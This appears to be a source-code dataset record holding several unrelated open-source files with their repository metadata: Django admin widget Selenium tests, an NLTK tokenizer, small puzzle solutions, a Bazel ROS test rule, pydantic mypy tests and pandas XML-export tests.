self.assertSelectOptions(from_box, [
str(self.lisa.id), str(self.peter.id),
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id),
])
self.assertSelectOptions(to_box, [])
self.assertActiveButtons(mode, field_name, False, False, True, False)
# Choose some options ------------------------------------------------
from_lisa_select_option = self.selenium.find_element_by_css_selector(
'{} > option[value="{}"]'.format(from_box, self.lisa.id)
)
# Check the title attribute is there for tool tips: ticket #20821
self.assertEqual(from_lisa_select_option.get_attribute('title'), from_lisa_select_option.get_attribute('text'))
self.select_option(from_box, str(self.lisa.id))
self.select_option(from_box, str(self.jason.id))
self.select_option(from_box, str(self.bob.id))
self.select_option(from_box, str(self.john.id))
self.assertActiveButtons(mode, field_name, True, False, True, False)
self.selenium.find_element_by_id(choose_link).click()
self.assertActiveButtons(mode, field_name, False, False, True, True)
self.assertSelectOptions(from_box, [
str(self.peter.id), str(self.arthur.id),
str(self.cliff.id), str(self.jenny.id),
])
self.assertSelectOptions(to_box, [
str(self.lisa.id), str(self.bob.id),
str(self.jason.id), str(self.john.id),
])
# Check the tooltip is still there after moving: ticket #20821
to_lisa_select_option = self.selenium.find_element_by_css_selector(
'{} > option[value="{}"]'.format(to_box, self.lisa.id)
)
self.assertEqual(to_lisa_select_option.get_attribute('title'), to_lisa_select_option.get_attribute('text'))
# Remove some options -------------------------------------------------
self.select_option(to_box, str(self.lisa.id))
self.select_option(to_box, str(self.bob.id))
self.assertActiveButtons(mode, field_name, False, True, True, True)
self.selenium.find_element_by_id(remove_link).click()
self.assertActiveButtons(mode, field_name, False, False, True, True)
self.assertSelectOptions(from_box, [
str(self.peter.id), str(self.arthur.id),
str(self.cliff.id), str(self.jenny.id),
str(self.lisa.id), str(self.bob.id)
])
self.assertSelectOptions(to_box, [str(self.jason.id), str(self.john.id)])
# Choose some more options --------------------------------------------
self.select_option(from_box, str(self.arthur.id))
self.select_option(from_box, str(self.cliff.id))
self.selenium.find_element_by_id(choose_link).click()
self.assertSelectOptions(from_box, [
str(self.peter.id), str(self.jenny.id),
str(self.lisa.id), str(self.bob.id),
])
self.assertSelectOptions(to_box, [
str(self.jason.id), str(self.john.id),
str(self.arthur.id), str(self.cliff.id),
])
# Choose some more options --------------------------------------------
self.select_option(from_box, str(self.peter.id))
self.select_option(from_box, str(self.lisa.id))
# Confirm they're selected after clicking inactive buttons: ticket #26575
self.assertSelectedOptions(from_box, [str(self.peter.id), str(self.lisa.id)])
self.selenium.find_element_by_id(remove_link).click()
self.assertSelectedOptions(from_box, [str(self.peter.id), str(self.lisa.id)])
# Unselect the options ------------------------------------------------
self.deselect_option(from_box, str(self.peter.id))
self.deselect_option(from_box, str(self.lisa.id))
# Choose some more options --------------------------------------------
self.select_option(to_box, str(self.jason.id))
self.select_option(to_box, str(self.john.id))
# Confirm they're selected after clicking inactive buttons: ticket #26575
self.assertSelectedOptions(to_box, [str(self.jason.id), str(self.john.id)])
self.selenium.find_element_by_id(choose_link).click()
self.assertSelectedOptions(to_box, [str(self.jason.id), str(self.john.id)])
# Unselect the options ------------------------------------------------
self.deselect_option(to_box, str(self.jason.id))
self.deselect_option(to_box, str(self.john.id))
# Pressing buttons shouldn't change the URL.
self.assertEqual(self.selenium.current_url, original_url)
def test_basic(self):
self.selenium.set_window_size(1024, 768)
self.school.students.set([self.lisa, self.peter])
self.school.alumni.set([self.lisa, self.peter])
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_school_change', args=(self.school.id,)))
self.wait_page_ready()
self.execute_basic_operations('vertical', 'students')
self.execute_basic_operations('horizontal', 'alumni')
# Save and check that everything is properly stored in the database ---
self.selenium.find_element_by_xpath('//input[@value="Save"]').click()
self.wait_page_ready()
self.school = School.objects.get(id=self.school.id) # Reload from database
self.assertEqual(list(self.school.students.all()), [self.arthur, self.cliff, self.jason, self.john])
self.assertEqual(list(self.school.alumni.all()), [self.arthur, self.cliff, self.jason, self.john])
def test_filter(self):
"""
Typing in the search box filters out options displayed in the 'from'
box.
"""
from selenium.webdriver.common.keys import Keys
self.selenium.set_window_size(1024, 768)
self.school.students.set([self.lisa, self.peter])
self.school.alumni.set([self.lisa, self.peter])
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_school_change', args=(self.school.id,)))
for field_name in ['students', 'alumni']:
from_box = '#id_%s_from' % field_name
to_box = '#id_%s_to' % field_name
choose_link = 'id_%s_add_link' % field_name
remove_link = 'id_%s_remove_link' % field_name
input = self.selenium.find_element_by_id('id_%s_input' % field_name)
# Initial values
self.assertSelectOptions(from_box, [
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id),
])
# Typing in some characters filters out non-matching options
input.send_keys('a')
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.jason.id)])
input.send_keys('R')
self.assertSelectOptions(from_box, [str(self.arthur.id)])
# Clearing the text box makes the other options reappear
input.send_keys([Keys.BACK_SPACE])
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.jason.id)])
input.send_keys([Keys.BACK_SPACE])
self.assertSelectOptions(from_box, [
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id),
])
# -----------------------------------------------------------------
# Choosing a filtered option sends it properly to the 'to' box.
input.send_keys('a')
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.jason.id)])
self.select_option(from_box, str(self.jason.id))
self.selenium.find_element_by_id(choose_link).click()
self.assertSelectOptions(from_box, [str(self.arthur.id)])
self.assertSelectOptions(to_box, [
str(self.lisa.id), str(self.peter.id), str(self.jason.id),
])
self.select_option(to_box, str(self.lisa.id))
self.selenium.find_element_by_id(remove_link).click()
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.lisa.id)])
self.assertSelectOptions(to_box, [str(self.peter.id), str(self.jason.id)])
input.send_keys([Keys.BACK_SPACE]) # Clear text box
self.assertSelectOptions(from_box, [
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jenny.id),
str(self.john.id), str(self.lisa.id),
])
self.assertSelectOptions(to_box, [str(self.peter.id), str(self.jason.id)])
# -----------------------------------------------------------------
# Pressing enter on a filtered option sends it properly to
# the 'to' box.
self.select_option(to_box, str(self.jason.id))
self.selenium.find_element_by_id(remove_link).click()
input.send_keys('ja')
self.assertSelectOptions(from_box, [str(self.jason.id)])
input.send_keys([Keys.ENTER])
self.assertSelectOptions(to_box, [str(self.peter.id), str(self.jason.id)])
input.send_keys([Keys.BACK_SPACE, Keys.BACK_SPACE])
# Save and check that everything is properly stored in the database ---
with self.wait_page_loaded():
self.selenium.find_element_by_xpath('//input[@value="Save"]').click()
self.school = School.objects.get(id=self.school.id) # Reload from database
self.assertEqual(list(self.school.students.all()), [self.jason, self.peter])
self.assertEqual(list(self.school.alumni.all()), [self.jason, self.peter])
def test_back_button_bug(self):
"""
Some browsers had a bug where navigating away from the change page
and then clicking the browser's back button would clear the
filter_horizontal/filter_vertical widgets (#13614).
"""
self.school.students.set([self.lisa, self.peter])
self.school.alumni.set([self.lisa, self.peter])
self.admin_login(username='super', password='secret', login_url='/')
change_url = reverse('admin:admin_widgets_school_change', args=(self.school.id,))
self.selenium.get(self.live_server_url + change_url)
# Navigate away and go back to the change form page.
self.selenium.find_element_by_link_text('Home').click()
self.selenium.back()
expected_unselected_values = [
str(self.arthur.id), str(self.bob.id), str(self.cliff.id),
str(self.jason.id), str(self.jenny.id), str(self.john.id),
]
expected_selected_values = [str(self.lisa.id), str(self.peter.id)]
# Everything is still in place
self.assertSelectOptions('#id_students_from', expected_unselected_values)
self.assertSelectOptions('#id_students_to', expected_selected_values)
self.assertSelectOptions('#id_alumni_from', expected_unselected_values)
self.assertSelectOptions('#id_alumni_to', expected_selected_values)
def test_refresh_page(self):
"""
Horizontal and vertical filter widgets keep selected options on page
reload (#22955).
"""
self.school.students.add(self.arthur, self.jason)
self.school.alumni.add(self.arthur, self.jason)
self.admin_login(username='super', password='secret', login_url='/')
change_url = reverse('admin:admin_widgets_school_change', args=(self.school.id,))
self.selenium.get(self.live_server_url + change_url)
options_len = len(self.selenium.find_elements_by_css_selector('#id_students_to > option'))
self.assertEqual(options_len, 2)
# self.selenium.refresh() or send_keys(Keys.F5) does hard reload and
# doesn't replicate what happens when a user clicks the browser's
# 'Refresh' button.
with self.wait_page_loaded():
self.selenium.execute_script("location.reload()")
options_len = len(self.selenium.find_elements_by_css_selector('#id_students_to > option'))
self.assertEqual(options_len, 2)
class AdminRawIdWidgetSeleniumTests(AdminWidgetSeleniumTestCase):
def setUp(self):
super().setUp()
Band.objects.create(id=42, name='Bogey Blues')
Band.objects.create(id=98, name='Green Potatoes')
def test_ForeignKey(self):
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_event_add'))
main_window = self.selenium.current_window_handle
# No value has been selected yet
self.assertEqual(self.selenium.find_element_by_id('id_main_band').get_attribute('value'), '')
# Open the popup window and click on a band
self.selenium.find_element_by_id('lookup_id_main_band').click()
self.wait_for_and_switch_to_popup()
link = self.selenium.find_element_by_link_text('Bogey Blues')
self.assertIn('/band/42/', link.get_attribute('href'))
link.click()
# The field now contains the selected band's id
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_main_band', '42')
# Reopen the popup window and click on another band
self.selenium.find_element_by_id('lookup_id_main_band').click()
self.wait_for_and_switch_to_popup()
link = self.selenium.find_element_by_link_text('Green Potatoes')
self.assertIn('/band/98/', link.get_attribute('href'))
link.click()
# The field now contains the other selected band's id
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_main_band', '98')
def test_many_to_many(self):
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_event_add'))
main_window = self.selenium.current_window_handle
# No value has been selected yet
self.assertEqual(self.selenium.find_element_by_id('id_supporting_bands').get_attribute('value'), '')
# Help text for the field is displayed
self.assertEqual(
self.selenium.find_element_by_css_selector('.field-supporting_bands div.help').text,
'Supporting Bands.'
)
# Open the popup window and click on a band
self.selenium.find_element_by_id('lookup_id_supporting_bands').click()
self.wait_for_and_switch_to_popup()
link = self.selenium.find_element_by_link_text('Bogey Blues')
self.assertIn('/band/42/', link.get_attribute('href'))
link.click()
# The field now contains the selected band's id
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_supporting_bands', '42')
# Reopen the popup window and click on another band
self.selenium.find_element_by_id('lookup_id_supporting_bands').click()
self.wait_for_and_switch_to_popup()
link = self.selenium.find_element_by_link_text('Green Potatoes')
self.assertIn('/band/98/', link.get_attribute('href'))
link.click()
# The field now contains the two selected bands' ids
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_supporting_bands', '42,98')
class RelatedFieldWidgetSeleniumTests(AdminWidgetSeleniumTestCase):
def test_ForeignKey_using_to_field(self):
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(self.live_server_url + reverse('admin:admin_widgets_profile_add'))
main_window = self.selenium.current_window_handle
# Click the Add User button to add new
self.selenium.find_element_by_id('add_id_user').click()
self.wait_for_and_switch_to_popup()
password_field = self.selenium.find_element_by_id('id_password')
password_field.send_keys('password')
username_field = self.selenium.find_element_by_id('id_username')
username_value = 'newuser'
username_field.send_keys(username_value)
save_button_css_selector = '.submit-row > input[type=submit]'
self.selenium.find_element_by_css_selector(save_button_css_selector).click()
self.selenium.switch_to.window(main_window)
# The field now contains the new user
self.selenium.find_element_by_css_selector('#id_user option[value=newuser]')
# Click the Change User button to change it
self.selenium.find_element_by_id('change_id_user').click()
self.wait_for_and_switch_to_popup()
username_field = self.selenium.find_element_by_id('id_username')
username_value = 'changednewuser'
username_field.clear()
username_field.send_keys(username_value)
save_button_css_selector = '.submit-row > input[type=submit]'
self.selenium.find_element_by_css_selector(save_button_css_selector).click()
self.selenium.switch_to.window(main_window)
self.selenium.find_element_by_css_selector('#id_user option[value=changednewuser]')
# Go ahead and submit the form to make sure it works
self.selenium.find_element_by_css_selector(save_button_css_selector).click()
self.wait_for_text('li.success', 'The profile “changednewuser” was added successfully.')
profiles = Profile.objects.all()
self.assertEqual(len(profiles), 1)
self.assertEqual(profiles[0].user.username, username_value)
| 44.491047
| 119
| 0.638798
|
908056ff88fedb13a85bf77ab30de842eda559fd
| 555
|
py
|
Python
|
tokenizer.py
|
jgprogramming/article-summarization
|
948197dc6038783947479cd51203d407c66dfe6f
|
[
"MIT"
] | null | null | null |
tokenizer.py
|
jgprogramming/article-summarization
|
948197dc6038783947479cd51203d407c66dfe6f
|
[
"MIT"
] | null | null | null |
tokenizer.py
|
jgprogramming/article-summarization
|
948197dc6038783947479cd51203d407c66dfe6f
|
[
"MIT"
] | null | null | null |
import nltk
from nltk.stem.lancaster import LancasterStemmer
stemmer = LancasterStemmer()
def stem_tokens(tokens):
stemmed = []
for item in tokens:
stemmed.append(stemmer.stem(item))
return stemmed
def tokenize(text):
tokens = nltk.word_tokenize(text)
stems = stem_tokens(tokens)
stems = [word.lower() for word in stems if word.isalpha()]
return stems
def tokenize_sent(text, title):
tCopy = text
if tCopy.startswith(title):
tCopy = tCopy[len(title):]
return nltk.sent_tokenize(tCopy.lstrip())
| 24.130435
| 62
| 0.69009
|
64174df3f745b290adadde3c335a9ea968f103e6
| 464
|
py
|
Python
|
Python2/candies.py
|
LaughDonor/hackerrank
|
07fc0e596b2b456aa72a3cd66036d718253777f0
|
[
"Apache-2.0"
] | null | null | null |
Python2/candies.py
|
LaughDonor/hackerrank
|
07fc0e596b2b456aa72a3cd66036d718253777f0
|
[
"Apache-2.0"
] | null | null | null |
Python2/candies.py
|
LaughDonor/hackerrank
|
07fc0e596b2b456aa72a3cd66036d718253777f0
|
[
"Apache-2.0"
] | null | null | null |
__author__, N = "LaughDonor", input()
candy, ratings = [1] * (N + 1), [input() for x in xrange(N)] + [0]
for i, c in enumerate(candy[1:N], 1):
left, mid, right = ratings[i - 1:i + 2]
if left < mid:
c = candy[i - 1] + 1
elif left > mid:
j = i
while i > 0 and ratings[j - 1] > ratings[j]:
candy[j - 1] = max(candy[j - 1], candy[j] + 1)
j -= 1
else:
c = 1
candy[i] = c
print sum(candy) - 1
| 27.294118
| 66
| 0.469828
|
de6ce813fe539aac67e8b0e2d072c20a18555ea1
| 1,320
|
bzl
|
Python
|
ros/test.bzl
|
mvukov/rules_ros
|
0919c94fae4c84f40c9ec23164345f6db8aef853
|
[
"Apache-2.0"
] | 14
|
2021-05-02T00:58:45.000Z
|
2022-01-11T07:01:27.000Z
|
ros/test.bzl
|
mvukov/rules_ros
|
0919c94fae4c84f40c9ec23164345f6db8aef853
|
[
"Apache-2.0"
] | null | null | null |
ros/test.bzl
|
mvukov/rules_ros
|
0919c94fae4c84f40c9ec23164345f6db8aef853
|
[
"Apache-2.0"
] | 1
|
2022-02-07T00:17:23.000Z
|
2022-02-07T00:17:23.000Z
|
"""Implements functionality for defining ROS tests.
"""
load("//third_party:expand_template.bzl", "expand_template")
load("@rules_python//python:defs.bzl", "py_test")
def ros_test(name, nodes, launch_file, launch_args = None, size = None):
"""Defines a ROS test.
Args:
name: The name of the test.
nodes: The nodes used by the test.
launch_file: The launch file used by the test.
launch_args: The launch arguments used by the test.
size: The size of the test.
"""
launch_file_path = "'$(location {})'".format(launch_file)
launch_args = launch_args or []
substitutions = {
"{launch_file}": launch_file_path,
"{launch_args}": ", ".join(launch_args),
}
launch_script = "{}_launch.py".format(name)
expand_template(
name = "{}_launch_gen".format(name),
template = "@com_github_mvukov_rules_ros//ros:test.py.tpl",
substitutions = substitutions,
out = launch_script,
data = [launch_file],
)
py_test(
name = name,
size = size or "medium",
srcs = [launch_script],
data = nodes + [launch_file],
main = launch_script,
visibility = ["//visibility:public"],
deps = ["@com_github_mvukov_rules_ros//third_party/legacy_rostest"],
)
| 31.428571
| 76
| 0.619697
|
980065ef92b38d4a6696df91cabfc6eed31f38f7
| 1,437
|
py
|
Python
|
1-99/t17.py
|
zifter/projecteuler
|
d2deb86254ffb3b0c08211da5dd2175f5b0fcb31
|
[
"MIT"
] | null | null | null |
1-99/t17.py
|
zifter/projecteuler
|
d2deb86254ffb3b0c08211da5dd2175f5b0fcb31
|
[
"MIT"
] | null | null | null |
1-99/t17.py
|
zifter/projecteuler
|
d2deb86254ffb3b0c08211da5dd2175f5b0fcb31
|
[
"MIT"
] | null | null | null |
# /usr/bin python
mapped_number = {
1: 'one',
2: 'two',
3: 'three',
4: 'four',
5: 'five',
6: 'six',
7: 'seven',
8: 'eight',
9: 'nine',
10: 'ten',
11: 'eleven',
12: 'twelve',
13: 'thirteen',
14: 'fourteen',
15: 'fifteen',
16: 'sixteen',
17: 'seventeen',
18: 'eighteen',
19: 'nineteen',
20: 'twenty',
30: 'thirty',
40: 'forty',
50: 'fifty',
60: 'sixty',
70: 'seventy',
80: 'eighty',
90: 'ninety',
100: 'hundred',
1000: 'thousand',
}
def lexical_cast(n):
if n < 21:
return mapped_number[n]
elif n < 100:
d = int(n/10)*10
t = int(n %10)
if t == 0:
return mapped_number[d]
else:
return '%s %s' % (mapped_number[d], mapped_number[t])
elif n == 100 or n == 1000:
return '%s %s' % (mapped_number[1], mapped_number[n])
elif n < 1000:
d = int(n/100)
t = int(n%100)
if t == 0:
return '%s %s' % (mapped_number[d], mapped_number[100])
else:
return '%s %s and %s' % (mapped_number[d], mapped_number[100], lexical_cast(t))
def length_of_lexical_numbers(t, b):
view = ''
for i in range(t, b+1):
view += lexical_cast(i)
view = view.replace(' ', '')
return len(view)
def main():
print length_of_lexical_numbers(1, 1000)
if __name__ == '__main__':
main()
| 20.528571
| 91
| 0.491997
|
4d8d0c1411bfe6ba5b793076b49281d4a101ff86
| 5,999
|
py
|
Python
|
tests/mypy/modules/success.py
|
sbv-csis/pydantic
|
eb21f92a7d2a1cda26b77b73cdc72ddec933aaf9
|
[
"MIT"
] | 2
|
2021-05-26T14:33:45.000Z
|
2022-01-22T13:07:57.000Z
|
tests/mypy/modules/success.py
|
sbv-csis/pydantic
|
eb21f92a7d2a1cda26b77b73cdc72ddec933aaf9
|
[
"MIT"
] | 98
|
2021-03-07T15:01:32.000Z
|
2022-03-28T18:05:24.000Z
|
tests/mypy/modules/success.py
|
sbv-csis/pydantic
|
eb21f92a7d2a1cda26b77b73cdc72ddec933aaf9
|
[
"MIT"
] | 1
|
2022-02-05T13:47:21.000Z
|
2022-02-05T13:47:21.000Z
|
"""
Test pydantic's compliance with mypy.
Do a little skipping about with types to demonstrate its usage.
"""
import json
import sys
from datetime import date, datetime
from pathlib import Path
from typing import Any, Dict, Generic, List, Optional, TypeVar
from uuid import UUID
from pydantic import (
UUID1,
BaseModel,
DirectoryPath,
FilePath,
Json,
NegativeFloat,
NegativeInt,
NoneStr,
NonNegativeFloat,
NonNegativeInt,
NonPositiveFloat,
NonPositiveInt,
PositiveFloat,
PositiveInt,
PyObject,
StrictBool,
StrictBytes,
StrictFloat,
StrictInt,
StrictStr,
root_validator,
validate_arguments,
validator,
)
from pydantic.fields import Field, PrivateAttr
from pydantic.generics import GenericModel
from pydantic.typing import ForwardRef
class Flags(BaseModel):
strict_bool: StrictBool = False
def __str__(self) -> str:
return f'flag={self.strict_bool}'
class Model(BaseModel):
age: int
first_name = 'John'
last_name: NoneStr = None
signup_ts: Optional[datetime] = None
list_of_ints: List[int]
@validator('age')
def check_age(cls, value: int) -> int:
assert value < 100, 'too old'
return value
@root_validator
def root_check(cls, values: Dict[str, Any]) -> Dict[str, Any]:
return values
@root_validator(pre=True, allow_reuse=False, skip_on_failure=False)
def pre_root_check(cls, values: Dict[str, Any]) -> Dict[str, Any]:
return values
def dog_years(age: int) -> int:
return age * 7
def day_of_week(dt: datetime) -> int:
return dt.date().isoweekday()
m = Model(age=21, list_of_ints=[1, '2', b'3'])
assert m.age == 21, m.age
m.age = 42
assert m.age == 42, m.age
assert m.first_name == 'John', m.first_name
assert m.last_name is None, m.last_name
assert m.list_of_ints == [1, 2, 3], m.list_of_ints
dog_age = dog_years(m.age)
assert dog_age == 294, dog_age
m = Model(age=2, first_name=b'Woof', last_name=b'Woof', signup_ts='2017-06-07 00:00', list_of_ints=[1, '2', b'3'])
assert m.first_name == 'Woof', m.first_name
assert m.last_name == 'Woof', m.last_name
assert m.signup_ts == datetime(2017, 6, 7), m.signup_ts
assert day_of_week(m.signup_ts) == 3
data = {'age': 10, 'first_name': 'Alena', 'last_name': 'Sousova', 'list_of_ints': [410]}
m_from_obj = Model.parse_obj(data)
assert isinstance(m_from_obj, Model)
assert m_from_obj.age == 10
assert m_from_obj.first_name == data['first_name']
assert m_from_obj.last_name == data['last_name']
assert m_from_obj.list_of_ints == data['list_of_ints']
m_from_raw = Model.parse_raw(json.dumps(data))
assert isinstance(m_from_raw, Model)
assert m_from_raw.age == m_from_obj.age
assert m_from_raw.first_name == m_from_obj.first_name
assert m_from_raw.last_name == m_from_obj.last_name
assert m_from_raw.list_of_ints == m_from_obj.list_of_ints
m_copy = m_from_obj.copy()
assert isinstance(m_from_raw, Model)
assert m_copy.age == m_from_obj.age
assert m_copy.first_name == m_from_obj.first_name
assert m_copy.last_name == m_from_obj.last_name
assert m_copy.list_of_ints == m_from_obj.list_of_ints
if sys.version_info >= (3, 7):
T = TypeVar('T')
class WrapperModel(GenericModel, Generic[T]):
payload: T
int_instance = WrapperModel[int](payload=1)
int_instance.payload += 1
assert int_instance.payload == 2
str_instance = WrapperModel[str](payload='a')
str_instance.payload += 'a'
assert str_instance.payload == 'aa'
model_instance = WrapperModel[Model](payload=m)
model_instance.payload.list_of_ints.append(4)
assert model_instance.payload.list_of_ints == [1, 2, 3, 4]
class WithField(BaseModel):
age: int
first_name: str = Field('John', const=True)
# simple decorator
@validate_arguments
def foo(a: int, *, c: str = 'x') -> str:
return c * a
foo(1, c='thing')
foo(1)
# nested decorator should not produce an error
@validate_arguments(config={'arbitrary_types_allowed': True})
def bar(a: int, *, c: str = 'x') -> str:
return c * a
bar(1, c='thing')
bar(1)
class Foo(BaseModel):
a: int
FooRef = ForwardRef('Foo')
class MyConf(BaseModel):
str_pyobject: PyObject = Field('datetime.date')
callable_pyobject: PyObject = Field(date)
conf = MyConf()
var1: date = conf.str_pyobject(2020, 12, 20)
var2: date = conf.callable_pyobject(2111, 1, 1)
class MyPrivateAttr(BaseModel):
_private_field: str = PrivateAttr()
class PydanticTypes(BaseModel):
# Boolean
my_strict_bool: StrictBool = True
# Integer
my_positive_int: PositiveInt = 1
my_negative_int: NegativeInt = -1
my_non_positive_int: NonPositiveInt = -1
my_non_negative_int: NonNegativeInt = 1
my_strict_int: StrictInt = 1
# Float
my_positive_float: PositiveFloat = 1.1
my_negative_float: NegativeFloat = -1.1
my_non_positive_float: NonPositiveFloat = -1.1
my_non_negative_float: NonNegativeFloat = 1.1
my_strict_float: StrictFloat = 1.1
# Bytes
my_strict_bytes: StrictBytes = b'pika'
# String
my_strict_str: StrictStr = 'pika'
# PyObject
my_pyobject_str: PyObject = 'datetime.date' # type: ignore
my_pyobject_callable: PyObject = date
# UUID
my_uuid1: UUID1 = UUID('a8098c1a-f86e-11da-bd1a-00112444be1e')
my_uuid1_str: UUID1 = 'a8098c1a-f86e-11da-bd1a-00112444be1e' # type: ignore
# Path
my_file_path: FilePath = Path(__file__)
my_file_path_str: FilePath = __file__ # type: ignore
my_dir_path: DirectoryPath = Path('.')
my_dir_path_str: DirectoryPath = '.' # type: ignore
# Json
my_json: Json = '{"hello": "world"}'
class Config:
validate_all = True
validated = PydanticTypes()
validated.my_pyobject_str(2021, 1, 1)
validated.my_pyobject_callable(2021, 1, 1)
validated.my_uuid1.hex
validated.my_uuid1_str.hex
validated.my_file_path.absolute()
validated.my_file_path_str.absolute()
validated.my_dir_path.absolute()
validated.my_dir_path_str.absolute()
| 25.312236
| 114
| 0.705618
|
97793ce8f65b8f39b67016b04c209af937aed0df
| 33,629
|
py
|
Python
|
pandas/tests/io/xml/test_to_xml.py
|
madhuv2002/pandas
|
006f1e0efb3ec81d52ff4d080b0c770b7b79d041
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | 2
|
2021-05-07T04:58:36.000Z
|
2021-05-07T04:58:59.000Z
|
pandas/tests/io/xml/test_to_xml.py
|
madhuv2002/pandas
|
006f1e0efb3ec81d52ff4d080b0c770b7b79d041
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
pandas/tests/io/xml/test_to_xml.py
|
madhuv2002/pandas
|
006f1e0efb3ec81d52ff4d080b0c770b7b79d041
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause"
] | 2
|
2021-06-16T07:19:12.000Z
|
2021-12-16T10:24:44.000Z
|
from io import (
BytesIO,
StringIO,
)
import os
import sys
from typing import Union
import numpy as np
import pytest
import pandas.util._test_decorators as td
from pandas import DataFrame
import pandas._testing as tm
from pandas.io.common import get_handle
from pandas.io.xml import read_xml
"""
CHECKLIST
[x] - ValueError: "Values for parser can only be lxml or etree."
etree
[x] - ImportError: "lxml not found, please install or use the etree parser."
[X] - TypeError: "...is not a valid type for attr_cols"
[X] - TypeError: "...is not a valid type for elem_cols"
[X] - LookupError: "unknown encoding"
[X] - KeyError: "...is not included in namespaces"
[X] - KeyError: "no valid column"
[X] - ValueError: "To use stylesheet, you need lxml installed..."
[] - OSError: (NEED PERMISSOIN ISSUE, DISK FULL, ETC.)
[X] - FileNotFoundError: "No such file or directory"
[X] - PermissionError: "Forbidden"
lxml
[X] - TypeError: "...is not a valid type for attr_cols"
[X] - TypeError: "...is not a valid type for elem_cols"
[X] - LookupError: "unknown encoding"
[] - OSError: (NEED PERMISSOIN ISSUE, DISK FULL, ETC.)
[X] - FileNotFoundError: "No such file or directory"
[X] - KeyError: "...is not included in namespaces"
[X] - KeyError: "no valid column"
[X] - ValueError: "stylesheet is not a url, file, or xml string."
[] - LookupError: (NEED WRONG ENCODING FOR FILE OUTPUT)
[] - URLError: (USUALLY DUE TO NETWORKING)
[] - HTTPError: (NEED AN ONLINE STYLESHEET)
[X] - OSError: "failed to load external entity"
[X] - XMLSyntaxError: "Opening and ending tag mismatch"
[X] - XSLTApplyError: "Cannot resolve URI"
[X] - XSLTParseError: "failed to compile"
[X] - PermissionError: "Forbidden"
"""
geom_df = DataFrame(
{
"shape": ["square", "circle", "triangle"],
"degrees": [360, 360, 180],
"sides": [4, np.nan, 3],
}
)
planet_df = DataFrame(
{
"planet": [
"Mercury",
"Venus",
"Earth",
"Mars",
"Jupiter",
"Saturn",
"Uranus",
"Neptune",
],
"type": [
"terrestrial",
"terrestrial",
"terrestrial",
"terrestrial",
"gas giant",
"gas giant",
"ice giant",
"ice giant",
],
"location": [
"inner",
"inner",
"inner",
"inner",
"outer",
"outer",
"outer",
"outer",
],
"mass": [
0.330114,
4.86747,
5.97237,
0.641712,
1898.187,
568.3174,
86.8127,
102.4126,
],
}
)
from_file_expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<index>0</index>
<category>cooking</category>
<title>Everyday Italian</title>
<author>Giada De Laurentiis</author>
<year>2005</year>
<price>30.0</price>
</row>
<row>
<index>1</index>
<category>children</category>
<title>Harry Potter</title>
<author>J K. Rowling</author>
<year>2005</year>
<price>29.99</price>
</row>
<row>
<index>2</index>
<category>web</category>
<title>Learning XML</title>
<author>Erik T. Ray</author>
<year>2003</year>
<price>39.95</price>
</row>
</data>"""
def equalize_decl(doc):
# etree and lxml differ on quotes and case in xml declaration
if doc is not None:
doc = doc.replace(
'<?xml version="1.0" encoding="utf-8"?',
"<?xml version='1.0' encoding='utf-8'?",
)
return doc
@pytest.fixture(params=["rb", "r"])
def mode(request):
return request.param
@pytest.fixture(params=[pytest.param("lxml", marks=td.skip_if_no("lxml")), "etree"])
def parser(request):
return request.param
# FILE OUTPUT
def test_file_output_str_read(datapath, parser):
filename = datapath("io", "data", "xml", "books.xml")
df_file = read_xml(filename, parser=parser)
with tm.ensure_clean("test.xml") as path:
df_file.to_xml(path, parser=parser)
with open(path, "rb") as f:
output = f.read().decode("utf-8").strip()
output = equalize_decl(output)
assert output == from_file_expected
def test_file_output_bytes_read(datapath, parser):
filename = datapath("io", "data", "xml", "books.xml")
df_file = read_xml(filename, parser=parser)
with tm.ensure_clean("test.xml") as path:
df_file.to_xml(path, parser=parser)
with open(path, "rb") as f:
output = f.read().decode("utf-8").strip()
output = equalize_decl(output)
assert output == from_file_expected
def test_str_output(datapath, parser):
filename = datapath("io", "data", "xml", "books.xml")
df_file = read_xml(filename, parser=parser)
output = df_file.to_xml(parser=parser)
output = equalize_decl(output)
assert output == from_file_expected
def test_wrong_file_path(parser):
with pytest.raises(
FileNotFoundError, match=("No such file or directory|没有那个文件或目录")
):
geom_df.to_xml("/my/fake/path/output.xml", parser=parser)
# INDEX
def test_index_false(datapath, parser):
expected = """\
<?xml version='1.0' encoding='utf-8'?>
<data>
<row>
<category>cooking</category>
<title>Everyday Italian</title>
<author>Giada De Laurentiis</author>
<year>2005</year>
<price>30.0</price>
</row>
<row>
<category>children</category>
<title>Harry Potter</title>
<author>J K. Rowling</author>
<year>2005</year>
<price>29.99</price>
</row>
<row>
<category>web</category>
<title>Learning XML</title>
<author>Erik T. Ray</author>
<year>2003</year>
<price>39.95</price>
</row>
</data>"""
